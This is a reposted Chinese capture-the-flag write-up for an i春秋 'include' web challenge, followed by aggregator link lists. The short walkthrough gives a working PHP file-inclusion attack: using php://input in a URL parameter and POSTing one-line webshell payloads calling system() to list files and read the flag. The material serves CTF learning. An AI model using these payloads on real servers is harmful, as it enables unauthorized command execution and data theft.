i春秋include

其他 2019-09-02 17:15:01 阅读次数: 0

打开题目,发现它提示我们有个phpinfo.php，所以我们直接访问，没有什么特殊的发现，根据题目提示include，找到allow_url_include的信息

（ctrl+f直接进入网页搜索）

发现是打开的。即允许php://input的形式，所以这里使用post传输数据

构造url：

http://169c1b893df145ceab40a9f940fab6573f46d3b3eb8d426a.changame.ichunqiu.com/?path=php://input

使用post传入一句话木马：<?php echo system('ls');?>

Run一下爆出许多文件

再使用bp抓包，修改下面的一句话木马中的值为<?php system("cat dle345aae.php");?>再传入repeater中Go一次得到flag

猜你喜欢

转载自www.cnblogs.com/wosun/p/11447569.html

i春秋include

i春秋 include wp

i春秋-web-include

i春秋Backdoor

i春秋Login

i春秋GetFlag

i春秋Not Found

i春秋象棋

i春秋Vld

i春秋Zone

i春秋Fuzz

i春秋登录

i春秋phone number

i春秋Upload

i春秋Fuzzing

i春秋-Web(一)

i春秋 web（2）

i春秋可恶的黑客

onethink-i春秋

时间-i春秋

i春秋-Crypot-Rotated

i春秋 web爆破3

i春秋 crypto write up

WriteUp-i春秋-溯源

i春秋-code(50分)

i春秋 Web Hello World

i春秋公益赛 ezpload

i春秋web作业2.24

i春秋web作业2.25

i春秋web作业2.26

今日推荐

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

周排行

rbac——界面、权限

Apache CXF + SpringMVC 整合发布WebService

so插件化

Vue.js实战系列---图标字体制作（svg格式）

PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---（C语言 + 详细注释）

被IRM保护的文档，打开失败

Calendar和Date计算日期差的小问题

win10子系统ubuntu18.4安装docker

利用Wrap Shell Script定位Android Native内存泄漏

MySQL: Transaction (Part I - Basic Concept)

每日归档

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)